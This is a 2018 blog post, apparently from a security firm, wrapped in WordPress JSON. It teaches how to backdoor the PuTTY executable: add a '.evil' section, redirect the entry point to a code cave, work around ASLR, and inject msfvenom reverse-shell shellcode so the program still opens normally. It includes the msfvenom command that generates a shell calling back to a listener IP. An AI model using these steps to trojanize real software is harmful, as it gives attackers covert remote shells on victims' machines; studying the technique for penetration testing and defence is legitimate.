{"id":7384,"date":"2018-06-19T12:44:15","date_gmt":"2018-06-19T10:44:15","guid":{"rendered":"https:\/\/hansesecure.de\/2018\/06\/backdooring-pe-file-with-aslr\/"},"modified":"2025-01-07T07:58:08","modified_gmt":"2025-01-07T06:58:08","slug":"backdooring-pe-file-with-aslr","status":"publish","type":"post","link":"https:\/\/hansesecure.de\/en\/2018\/06\/backdooring-pe-file-with-aslr\/","title":{"rendered":"Backdooring PE-File (with ASLR)"},"content":{"rendered":"<p>Welcome to my next blog post. Today I want to show you some basic pentesting stuff. We will manually backdooring a PE file, in this case the putty client. I used the following software setup:<\/p>\n<ul>\n<li>Windows 10 Pro 32 bit<\/li>\n<li>Putty<\/li>\n<li>Stud_PE<\/li>\n<li>Immunity debugger<\/li>\n<\/ul>\n<p>Before we are getting our hands into assembly, i want to explain what we will do.<\/p>\n<p>We will add a section header named .evil to our file and hijack the file&#8217;s execution flow. At the entry point we will redirect the execution to our shellcode and after gaining our shell, the ordinary appliaction is running (putty starts).<\/p>\n<table border=\"0\">\n<tbody>\n<tr>\n<td><a href=\"https:\/\/hansesecure.de\/wp-banane\/uploads\/2018\/06\/stack_orign.jpg\"><img fetchpriority=\"high\" decoding=\"async\" class=\"aligncenter wp-image-965\" src=\"https:\/\/hansesecure.de\/wp-banane\/uploads\/2018\/06\/stack_orign-205x300.jpg\" alt=\"\" width=\"300\" height=\"439\"><\/a><\/td>\n<td><a href=\"https:\/\/hansesecure.de\/wp-banane\/uploads\/2018\/06\/stack_changed.jpg\"><img decoding=\"async\" class=\"aligncenter wp-image-967\" src=\"https:\/\/hansesecure.de\/wp-banane\/uploads\/2018\/06\/stack_changed-164x300.jpg\" alt=\"\" width=\"300\" height=\"550\"><\/a><\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p>&nbsp;<\/p>\n<table border=\"0\">\n<tbody>\n<tr>\n<td><a href=\"https:\/\/hansesecure.de\/wp-banane\/uploads\/2018\/06\/flow_orign.jpg\"><img decoding=\"async\" class=\"size-medium wp-image-968 aligncenter\" src=\"https:\/\/hansesecure.de\/wp-banane\/uploads\/2018\/06\/flow_orign-300x271.jpg\" alt=\"\" width=\"300\" height=\"271\"><\/a><\/td>\n<td><a href=\"https:\/\/hansesecure.de\/wp-banane\/uploads\/2018\/06\/flow_changed.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"size-medium wp-image-969 aligncenter\" src=\"https:\/\/hansesecure.de\/wp-banane\/uploads\/2018\/06\/flow_changed-300x265.jpg\" alt=\"\" width=\"300\" height=\"265\"><\/a><\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<h2>#0x01 Adding Section<\/h2>\n<p>At first we are going to add our new section .evil to our file through Stud_PE. The following pictures are pritty self explaining \ud83d\ude09<\/p>\n<table border=\"0\">\n<tbody>\n<tr>\n<td><a href=\"https:\/\/hansesecure.de\/wp-banane\/uploads\/2018\/06\/studPE_01.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-970\" src=\"https:\/\/hansesecure.de\/wp-banane\/uploads\/2018\/06\/studPE_01-300x217.jpg\" alt=\"\" width=\"300\" height=\"217\"><\/a><\/td>\n<td><a href=\"https:\/\/hansesecure.de\/wp-banane\/uploads\/2018\/06\/studPE_02.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-971\" src=\"https:\/\/hansesecure.de\/wp-banane\/uploads\/2018\/06\/studPE_02-300x272.jpg\" alt=\"\" width=\"300\" height=\"272\"><\/a><\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p>I chose a section size of 1500 bytes which are filled with nullbytes. That&#8217;s more than enough for our shellcode.<\/p>\n<p><a href=\"https:\/\/hansesecure.de\/wp-banane\/uploads\/2018\/06\/studPE_03.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-972\" src=\"https:\/\/hansesecure.de\/wp-banane\/uploads\/2018\/06\/studPE_03-300x219.jpg\" alt=\"\" width=\"400\" height=\"292\"><\/a><\/p>\n<p>After saving the file and loading it into Immunity you can see the differences between the two files (new section .evil is spawned).<\/p>\n<table border=\"0\">\n<tbody>\n<tr>\n<td><a href=\"https:\/\/hansesecure.de\/wp-banane\/uploads\/2018\/06\/sections_01.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-974\" src=\"https:\/\/hansesecure.de\/wp-banane\/uploads\/2018\/06\/sections_01-300x105.jpg\" alt=\"\" width=\"400\" height=\"141\"><\/a><\/td>\n<td><a href=\"https:\/\/hansesecure.de\/wp-banane\/uploads\/2018\/06\/sections_02.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-975\" src=\"https:\/\/hansesecure.de\/wp-banane\/uploads\/2018\/06\/sections_02-300x112.jpg\" alt=\"\" width=\"400\" height=\"150\"><\/a><\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p>And if you look at the adress of .evil you will see the following (our predifined nullbytes) -&gt; Great! \ud83d\ude09<\/p>\n<p><a href=\"https:\/\/hansesecure.de\/wp-banane\/uploads\/2018\/06\/dump_section.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-973\" src=\"https:\/\/hansesecure.de\/wp-banane\/uploads\/2018\/06\/dump_section-300x161.jpg\" alt=\"\" width=\"400\" height=\"215\"><\/a><\/p>\n<p>While checking our new section you may noticed, that the adresses has slighty changed. The last 4 bytes are always nullbytes but the first 4 bytes are changing through every reloading process of the file.<\/p>\n<p><b>00FB0000<\/b> &lt;-&gt; <b>00250000<\/b><\/p>\n<table border=\"0\">\n<tbody>\n<tr>\n<td><a href=\"https:\/\/hansesecure.de\/wp-banane\/uploads\/2018\/06\/aslr_01.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-976\" src=\"https:\/\/hansesecure.de\/wp-banane\/uploads\/2018\/06\/aslr_01-300x106.jpg\" alt=\"\" width=\"400\" height=\"141\"><\/a><\/td>\n<td><a href=\"https:\/\/hansesecure.de\/wp-banane\/uploads\/2018\/06\/aslr_02.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-977\" src=\"https:\/\/hansesecure.de\/wp-banane\/uploads\/2018\/06\/aslr_02-300x112.jpg\" alt=\"\" width=\"400\" height=\"150\"><\/a><\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p>&nbsp;<\/p>\n<p>That&#8217;s a kernel protection ASLR, you can find more information about this countermeasurement <a href=\"https:\/\/en.wikipedia.org\/wiki\/Address_space_layout_randomization\" target=\"_blank\" rel=\"noopener noreferrer\">here<\/a>. This makes some more work, but isn&#8217;t a problem (more later).<\/p>\n<p>&nbsp;<\/p>\n<h2>#0x02 Hijack Execution Flow<\/h2>\n<p>Now we are looking at the entry point of our file in Immunity. The First instruction at 0x002B7FD6 is a call instruction. We are going to change the first instructions to jump into our code cave (.evil). Before changing any assembly instruction copy the &#8216;old&#8217; instructions to a text file, because we are going to resume to the application flow after executing our shellcode.<\/p>\n<p><a href=\"https:\/\/hansesecure.de\/wp-banane\/uploads\/2018\/06\/save_instructions.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-978\" src=\"https:\/\/hansesecure.de\/wp-banane\/uploads\/2018\/06\/save_instructions-300x85.jpg\" alt=\"\" width=\"400\" height=\"114\"><\/a><\/p>\n<p>Mark the first instruction and type &#8220;jmp [address of .evil]&#8221; in my case &#8220;jmp 0x002E3000&#8221;. After hitting enter you will see the following:<\/p>\n<p><a href=\"https:\/\/hansesecure.de\/wp-banane\/uploads\/2018\/06\/change_01.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-979\" src=\"https:\/\/hansesecure.de\/wp-banane\/uploads\/2018\/06\/change_01-300x47.jpg\" alt=\"\" width=\"400\" height=\"62\"><\/a><\/p>\n<p>Save the changes to a new file and open it in immunity.<\/p>\n<table border=\"0\">\n<tbody>\n<tr>\n<td><a href=\"https:\/\/hansesecure.de\/wp-banane\/uploads\/2018\/06\/save_01.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-980\" src=\"https:\/\/hansesecure.de\/wp-banane\/uploads\/2018\/06\/save_01-300x268.jpg\" alt=\"\" width=\"400\" height=\"358\"><\/a><\/td>\n<td><a href=\"https:\/\/hansesecure.de\/wp-banane\/uploads\/2018\/06\/save_02.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-981\" src=\"https:\/\/hansesecure.de\/wp-banane\/uploads\/2018\/06\/save_02-300x176.jpg\" alt=\"\" width=\"400\" height=\"235\"><\/a><\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p>&nbsp;<\/p>\n<p>Now we are taking the first instruction with F7 and are landing in our code cave of nullbytes at the .evil address.<\/p>\n<p><a href=\"https:\/\/hansesecure.de\/wp-banane\/uploads\/2018\/06\/jmp.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-983\" src=\"https:\/\/hansesecure.de\/wp-banane\/uploads\/2018\/06\/jmp-300x151.jpg\" alt=\"\" width=\"400\" height=\"201\"><\/a><\/p>\n<p>For our testing purpose we replace the nullbytes with nops. To do so just mark all the nullbytes of the code cave and do the following:<\/p>\n<p><a href=\"https:\/\/hansesecure.de\/wp-banane\/uploads\/2018\/06\/nops.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-985\" src=\"https:\/\/hansesecure.de\/wp-banane\/uploads\/2018\/06\/nops-300x91.jpg\" alt=\"\" width=\"400\" height=\"121\"><\/a><\/p>\n<p>We save the state of our registers on the top of the stack through the assembly instruction pushad &amp;&amp; pushfd.<\/p>\n<p><a href=\"https:\/\/hansesecure.de\/wp-banane\/uploads\/2018\/10\/register_01.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"wp-image-1034 aligncenter\" src=\"https:\/\/hansesecure.de\/wp-banane\/uploads\/2018\/10\/register_01-300x48.jpg\" alt=\"\" width=\"400\" height=\"63\"><\/a><\/p>\n<p>At the end of our code cave we restore our register states with popfd and popad.<\/p>\n<p><a href=\"https:\/\/hansesecure.de\/wp-banane\/uploads\/2018\/06\/register_02.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-987\" src=\"https:\/\/hansesecure.de\/wp-banane\/uploads\/2018\/06\/register_02-300x132.jpg\" alt=\"\" width=\"400\" height=\"176\"><\/a><\/p>\n<p>So far no problems (hopefully). Now we do some math to encounter the ASLR protection.<\/p>\n<p>We want to restore all overwritten functions at the end of our code cave and jump right back into the &#8220;old&#8221; execution flow. If you are looking at the entry ponit of our file, you will see that only the call instruction is missing. Without enabled ASLR we could use the saved address from our textfile just like &#8220;call x002B8265&#8221;, but you see that the address of the second instruction &#8220;jmp 0x002B7E6E&#8221; has also changed&#8230; ASLR Hurray! \ud83d\ude09<\/p>\n<p>What now? We have to determine the offset between the old addresses to calculate the new overwritten call instruction. Instead trying to explain the several locations, addresses and relations i try to show it in following pictures (if this isn&#8217;t enough, plz tell me via <a href=\"https:\/\/twitter.com\/HanseSecure\" target=\"_blank\" rel=\"noopener noreferrer\">twitter<\/a> and i will add text sections)<\/p>\n<p><a href=\"https:\/\/hansesecure.de\/wp-banane\/uploads\/2018\/06\/aslr_03.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-988\" src=\"https:\/\/hansesecure.de\/wp-banane\/uploads\/2018\/06\/aslr_03-300x78.jpg\" alt=\"\" width=\"400\" height=\"105\"><\/a><\/p>\n<p><a href=\"https:\/\/hansesecure.de\/wp-banane\/uploads\/2018\/06\/aslr_04.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-989\" src=\"https:\/\/hansesecure.de\/wp-banane\/uploads\/2018\/06\/aslr_04-300x92.jpg\" alt=\"\" width=\"400\" height=\"123\"><\/a><\/p>\n<p><a href=\"https:\/\/hansesecure.de\/wp-banane\/uploads\/2018\/06\/aslr_05.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-991\" src=\"https:\/\/hansesecure.de\/wp-banane\/uploads\/2018\/06\/aslr_05-300x181.jpg\" alt=\"\" width=\"400\" height=\"242\"><\/a> <a href=\"https:\/\/hansesecure.de\/wp-banane\/uploads\/2018\/06\/aslr_06.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-992\" src=\"https:\/\/hansesecure.de\/wp-banane\/uploads\/2018\/06\/aslr_06-300x150.jpg\" alt=\"\" width=\"400\" height=\"200\"><\/a><\/p>\n<p>In the end we got the &#8220;new&#8221; address for our overwritten call instruction which is 0x13F8265. We place this call instruction right behind the restored registers (pushfd, pushad).<\/p>\n<p>Now we only need to jmp to the next ordinary instruction at the entry point via &#8220;jmp 0x01067FD8&#8221; and the execution will flow.<\/p>\n<h2>#0x03 Inject shellcode<\/h2>\n<p>Choose your favourite shellcode or generate a new one . I used the following command <code>msfvenom -p windows\/shell_reverse_tcp lhost=10.0.2.6 lport=1337 exitfunc=thread -f hex<br \/>\n<\/code> Then use the binary paste function of Immunity to replace some of our nops with the shellcode.<\/p>\n<p><a href=\"https:\/\/hansesecure.de\/wp-banane\/uploads\/2018\/06\/msfvenom.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-994\" src=\"https:\/\/hansesecure.de\/wp-banane\/uploads\/2018\/06\/msfvenom-300x80.jpg\" alt=\"\" width=\"400\" height=\"107\"><\/a><a href=\"https:\/\/hansesecure.de\/wp-banane\/uploads\/2018\/06\/inject.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-993\" src=\"https:\/\/hansesecure.de\/wp-banane\/uploads\/2018\/06\/inject-300x147.jpg\" alt=\"\" width=\"400\" height=\"196\"><\/a><\/p>\n<p>Save the file and voila, you sucessfully backdoored a PE-File !<\/p>\n<p>Ok, just one thing is missing. The shellcode of msfvenom used the WaitForSingleObject function and the default values prevent the application to execute until the shell is released.<\/p>\n<p>To solve this change the &#8220;DEC ESI&#8221; code at the end of the shellcode with a nop.<\/p>\n<p><a href=\"https:\/\/hansesecure.de\/wp-banane\/uploads\/2018\/06\/fixed_shellcode.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-995\" src=\"https:\/\/hansesecure.de\/wp-banane\/uploads\/2018\/06\/fixed_shellcode-300x50.jpg\" alt=\"\" width=\"400\" height=\"67\"><\/a><\/p>\n<p>&nbsp;<\/p>\n<h2>0x04 PoC<\/h2>\n<p>Start your listener and fire up the application.<\/p>\n<p><a href=\"https:\/\/hansesecure.de\/wp-banane\/uploads\/2018\/06\/PoC.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-996\" src=\"https:\/\/hansesecure.de\/wp-banane\/uploads\/2018\/06\/PoC-300x151.jpg\" alt=\"\" width=\"400\" height=\"201\"><\/a><\/p>\n<p>Thanks for reading and if you like this post, check my&nbsp;<a href=\"https:\/\/twitter.com\/HanseSecure\" target=\"_blank\" rel=\"noopener noreferrer\">twitter<\/a>&nbsp;account please! xD<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Welcome to my next blog post. Today I want to show you some basic pentesting stuff. We will manually backdooring a PE file, in this case the putty client. I used the following software setup: Windows 10 Pro 32 bit Putty Stud_PE Immunity debugger Before we are getting our hands into assembly, i want to [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_acf_changed":false,"footnotes":""},"categories":[257],"tags":[266],"class_list":["post-7384","post","type-post","status-publish","format-standard","hentry","category-deep-dive-techniques","tag-migration-en"],"acf":[],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.3 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Backdooring PE-File (with ASLR) &#8211; HanseSecure GmbH<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/hansesecure.de\/en\/2018\/06\/backdooring-pe-file-with-aslr\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Backdooring PE-File (with ASLR) &#8211; HanseSecure GmbH\" \/>\n<meta property=\"og:description\" content=\"Welcome to my next blog post. Today I want to show you some basic pentesting stuff. We will manually backdooring a PE file, in this case the putty client. I used the following software setup: Windows 10 Pro 32 bit Putty Stud_PE Immunity debugger Before we are getting our hands into assembly, i want to [&hellip;]\" \/>\n<meta property=\"og:url\" content=\"https:\/\/hansesecure.de\/en\/2018\/06\/backdooring-pe-file-with-aslr\/\" \/>\n<meta property=\"og:site_name\" content=\"HanseSecure GmbH\" \/>\n<meta property=\"article:publisher\" content=\"https:\/\/facebook.com\/hansesecure\" \/>\n<meta property=\"article:published_time\" content=\"2018-06-19T10:44:15+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2025-01-07T06:58:08+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/hansesecure.de\/wp-banane\/uploads\/2018\/06\/stack_orign-205x300.jpg\" \/>\n<meta name=\"author\" content=\"HanseSecure\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@CyberWarship\" \/>\n<meta name=\"twitter:site\" content=\"@CyberWarship\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"HanseSecure\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"4 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/hansesecure.de\\\/en\\\/2018\\\/06\\\/backdooring-pe-file-with-aslr\\\/#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/hansesecure.de\\\/en\\\/2018\\\/06\\\/backdooring-pe-file-with-aslr\\\/\"},\"author\":{\"name\":\"HanseSecure\",\"@id\":\"https:\\\/\\\/hansesecure.de\\\/en\\\/#\\\/schema\\\/person\\\/6ec6ef4887ff2fc97a14f1a7f390f593\"},\"headline\":\"Backdooring PE-File (with ASLR)\",\"datePublished\":\"2018-06-19T10:44:15+00:00\",\"dateModified\":\"2025-01-07T06:58:08+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/hansesecure.de\\\/en\\\/2018\\\/06\\\/backdooring-pe-file-with-aslr\\\/\"},\"wordCount\":776,\"publisher\":{\"@id\":\"https:\\\/\\\/hansesecure.de\\\/en\\\/#organization\"},\"image\":{\"@id\":\"https:\\\/\\\/hansesecure.de\\\/en\\\/2018\\\/06\\\/backdooring-pe-file-with-aslr\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/hansesecure.de\\\/wp-banane\\\/uploads\\\/2018\\\/06\\\/stack_orign-205x300.jpg\",\"keywords\":[\"Migration\"],\"articleSection\":[\"Deep Dive Techniques\"],\"inLanguage\":\"en-US\"},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/hansesecure.de\\\/en\\\/2018\\\/06\\\/backdooring-pe-file-with-aslr\\\/\",\"url\":\"https:\\\/\\\/hansesecure.de\\\/en\\\/2018\\\/06\\\/backdooring-pe-file-with-aslr\\\/\",\"name\":\"Backdooring PE-File (with ASLR) &#8211; HanseSecure GmbH\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/hansesecure.de\\\/en\\\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/hansesecure.de\\\/en\\\/2018\\\/06\\\/backdooring-pe-file-with-aslr\\\/#primaryimage\"},\"image\":{\"@id\":\"https:\\\/\\\/hansesecure.de\\\/en\\\/2018\\\/06\\\/backdooring-pe-file-with-aslr\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/hansesecure.de\\\/wp-banane\\\/uploads\\\/2018\\\/06\\\/stack_orign-205x300.jpg\",\"datePublished\":\"2018-06-19T10:44:15+00:00\",\"dateModified\":\"2025-01-07T06:58:08+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/hansesecure.de\\\/en\\\/2018\\\/06\\\/backdooring-pe-file-with-aslr\\\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/hansesecure.de\\\/en\\\/2018\\\/06\\\/backdooring-pe-file-with-aslr\\\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/hansesecure.de\\\/en\\\/2018\\\/06\\\/backdooring-pe-file-with-aslr\\\/#primaryimage\",\"url\":\"https:\\\/\\\/hansesecure.de\\\/wp-banane\\\/uploads\\\/2018\\\/06\\\/stack_orign-205x300.jpg\",\"contentUrl\":\"https:\\\/\\\/hansesecure.de\\\/wp-banane\\\/uploads\\\/2018\\\/06\\\/stack_orign-205x300.jpg\"},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/hansesecure.de\\\/en\\\/2018\\\/06\\\/backdooring-pe-file-with-aslr\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Startseite\",\"item\":\"https:\\\/\\\/hansesecure.de\\\/en\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Backdooring PE-File (with ASLR)\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/hansesecure.de\\\/en\\\/#website\",\"url\":\"https:\\\/\\\/hansesecure.de\\\/en\\\/\",\"name\":\"HanseSecure GmbH\",\"description\":\"Choose the Intruder\",\"publisher\":{\"@id\":\"https:\\\/\\\/hansesecure.de\\\/en\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/hansesecure.de\\\/en\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/hansesecure.de\\\/en\\\/#organization\",\"name\":\"HanseSecure GmbH\",\"url\":\"https:\\\/\\\/hansesecure.de\\\/en\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/hansesecure.de\\\/en\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"https:\\\/\\\/hansesecure.de\\\/wp-content\\\/uploads\\\/2023\\\/05\\\/cropped-000-LOGO-intensiv-schwarz-rot-HanseSecure_LOGO_CTI_Vektor_rotes_H11806.png\",\"contentUrl\":\"https:\\\/\\\/hansesecure.de\\\/wp-content\\\/uploads\\\/2023\\\/05\\\/cropped-000-LOGO-intensiv-schwarz-rot-HanseSecure_LOGO_CTI_Vektor_rotes_H11806.png\",\"width\":512,\"height\":512,\"caption\":\"HanseSecure GmbH\"},\"image\":{\"@id\":\"https:\\\/\\\/hansesecure.de\\\/en\\\/#\\\/schema\\\/logo\\\/image\\\/\"},\"sameAs\":[\"https:\\\/\\\/facebook.com\\\/hansesecure\",\"https:\\\/\\\/x.com\\\/CyberWarship\",\"https:\\\/\\\/www.linkedin.com\\\/company\\\/hansesecure\",\"https:\\\/\\\/www.youtube.com\\\/channel\\\/UCAABbKOA_stDFkEKS3MSF7Q\",\"https:\\\/\\\/www.instagram.com\\\/hansesecure\\\/\"]},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/hansesecure.de\\\/en\\\/#\\\/schema\\\/person\\\/6ec6ef4887ff2fc97a14f1a7f390f593\",\"name\":\"HanseSecure\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/58fe26b2270315f2ab1268b229465b72c497c86aac3696aaaf2e629ae4e4f0af?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/58fe26b2270315f2ab1268b229465b72c497c86aac3696aaaf2e629ae4e4f0af?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/58fe26b2270315f2ab1268b229465b72c497c86aac3696aaaf2e629ae4e4f0af?s=96&d=mm&r=g\",\"caption\":\"HanseSecure\"}}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Backdooring PE-File (with ASLR) &#8211; HanseSecure GmbH","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/hansesecure.de\/en\/2018\/06\/backdooring-pe-file-with-aslr\/","og_locale":"en_US","og_type":"article","og_title":"Backdooring PE-File (with ASLR) &#8211; HanseSecure GmbH","og_description":"Welcome to my next blog post. Today I want to show you some basic pentesting stuff. We will manually backdooring a PE file, in this case the putty client. I used the following software setup: Windows 10 Pro 32 bit Putty Stud_PE Immunity debugger Before we are getting our hands into assembly, i want to [&hellip;]","og_url":"https:\/\/hansesecure.de\/en\/2018\/06\/backdooring-pe-file-with-aslr\/","og_site_name":"HanseSecure GmbH","article_publisher":"https:\/\/facebook.com\/hansesecure","article_published_time":"2018-06-19T10:44:15+00:00","article_modified_time":"2025-01-07T06:58:08+00:00","og_image":[{"url":"https:\/\/hansesecure.de\/wp-banane\/uploads\/2018\/06\/stack_orign-205x300.jpg","type":"","width":"","height":""}],"author":"HanseSecure","twitter_card":"summary_large_image","twitter_creator":"@CyberWarship","twitter_site":"@CyberWarship","twitter_misc":{"Written by":"HanseSecure","Est. reading time":"4 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/hansesecure.de\/en\/2018\/06\/backdooring-pe-file-with-aslr\/#article","isPartOf":{"@id":"https:\/\/hansesecure.de\/en\/2018\/06\/backdooring-pe-file-with-aslr\/"},"author":{"name":"HanseSecure","@id":"https:\/\/hansesecure.de\/en\/#\/schema\/person\/6ec6ef4887ff2fc97a14f1a7f390f593"},"headline":"Backdooring PE-File (with ASLR)","datePublished":"2018-06-19T10:44:15+00:00","dateModified":"2025-01-07T06:58:08+00:00","mainEntityOfPage":{"@id":"https:\/\/hansesecure.de\/en\/2018\/06\/backdooring-pe-file-with-aslr\/"},"wordCount":776,"publisher":{"@id":"https:\/\/hansesecure.de\/en\/#organization"},"image":{"@id":"https:\/\/hansesecure.de\/en\/2018\/06\/backdooring-pe-file-with-aslr\/#primaryimage"},"thumbnailUrl":"https:\/\/hansesecure.de\/wp-banane\/uploads\/2018\/06\/stack_orign-205x300.jpg","keywords":["Migration"],"articleSection":["Deep Dive Techniques"],"inLanguage":"en-US"},{"@type":"WebPage","@id":"https:\/\/hansesecure.de\/en\/2018\/06\/backdooring-pe-file-with-aslr\/","url":"https:\/\/hansesecure.de\/en\/2018\/06\/backdooring-pe-file-with-aslr\/","name":"Backdooring PE-File (with ASLR) &#8211; HanseSecure GmbH","isPartOf":{"@id":"https:\/\/hansesecure.de\/en\/#website"},"primaryImageOfPage":{"@id":"https:\/\/hansesecure.de\/en\/2018\/06\/backdooring-pe-file-with-aslr\/#primaryimage"},"image":{"@id":"https:\/\/hansesecure.de\/en\/2018\/06\/backdooring-pe-file-with-aslr\/#primaryimage"},"thumbnailUrl":"https:\/\/hansesecure.de\/wp-banane\/uploads\/2018\/06\/stack_orign-205x300.jpg","datePublished":"2018-06-19T10:44:15+00:00","dateModified":"2025-01-07T06:58:08+00:00","breadcrumb":{"@id":"https:\/\/hansesecure.de\/en\/2018\/06\/backdooring-pe-file-with-aslr\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/hansesecure.de\/en\/2018\/06\/backdooring-pe-file-with-aslr\/"]}]},{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/hansesecure.de\/en\/2018\/06\/backdooring-pe-file-with-aslr\/#primaryimage","url":"https:\/\/hansesecure.de\/wp-banane\/uploads\/2018\/06\/stack_orign-205x300.jpg","contentUrl":"https:\/\/hansesecure.de\/wp-banane\/uploads\/2018\/06\/stack_orign-205x300.jpg"},{"@type":"BreadcrumbList","@id":"https:\/\/hansesecure.de\/en\/2018\/06\/backdooring-pe-file-with-aslr\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Startseite","item":"https:\/\/hansesecure.de\/en\/"},{"@type":"ListItem","position":2,"name":"Backdooring PE-File (with ASLR)"}]},{"@type":"WebSite","@id":"https:\/\/hansesecure.de\/en\/#website","url":"https:\/\/hansesecure.de\/en\/","name":"HanseSecure GmbH","description":"Choose the Intruder","publisher":{"@id":"https:\/\/hansesecure.de\/en\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/hansesecure.de\/en\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/hansesecure.de\/en\/#organization","name":"HanseSecure 